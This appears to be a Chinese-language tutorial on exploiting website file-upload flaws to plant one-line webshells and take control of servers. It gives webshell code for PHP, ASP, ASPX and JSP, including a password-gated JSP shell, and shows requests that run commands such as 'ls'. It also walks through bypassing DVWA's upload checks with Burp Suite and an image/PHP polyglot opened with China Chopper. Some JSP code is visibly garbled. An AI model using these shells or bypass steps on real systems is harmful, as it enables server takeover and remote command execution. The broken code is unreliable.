利⽤⽹站上传漏洞使⽤⼀句话⽊马控制服务器
⼀句话⽊马
常⽤于php、asp、aspx
php
<?php echo shell_exec($_GET['cmd']);?>
asp
<%execute(request("value"))%>
aspx
<%@ Page Language="Jscript"%>
<%eval(Request.Item["value"])%>
jsp
⽆回显执⾏系统命令
<%Runtime().Parameter("cmd"));%>
请求:192.168.16.240:8080/Shell/cmd2.jsp?cmd=ls
执⾏之后不会有任何回显,⽤来反弹个shell很⽅便。
有回显带密码验证的
<%
if("123".Parameter("pwd"))){
java.io.InputStream in = Runtime().Parameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((ad(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
请求:192.168.16.240:8080/Shell/cmd2.jsp?pwd=123&cmd=ls /
上传⽂件
通过Burp Suite绕过前端验证⽂件格式,通过修改数据包通过后端检验。
安全级别Low
前后端没有任何验证
安全级别Medium
仅前端判断⽂件后缀名
当前端提⽰不能发送⾮jpg、png格式时,Burp Suite配置好Proxy -》 Options,并在Proxy-》Intercept-》Intercept is on,浏览器设置代理为Options中的配置
⾸先把shell.php后缀改为jpg,然后提交,在filename中把⽂件shell.jpg后缀改为shell.php
ueditor漏洞php如何解决安全级别High
准备⼀个图⽚和shell.php脚本,windows下运⾏
copy 1.png/b+shell.php/a shell.png
将图⽚上传后,使⽤中国菜⼑连接(中国菜⼑可以把图⽚当成php执⾏)访问
这⾥以php的 <?php echo shell_exec($_GET['cmd']);?> 为例⼦
访问⼀句话⽊马⽂件(要知道上传的⽂件⽬录)
127.0.0.1/dvwa/hackable/uploads/shell.php?cmd=ls
php中的cmd是参数
可以看到cmd参数为ls是直接查询当前⽬录下的⽂件
同样可以操作其他⽬录⽂件
其他kali下的web后门⼯具
webacoo
仅适⽤于php
weevely 仅适⽤于php
参考
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论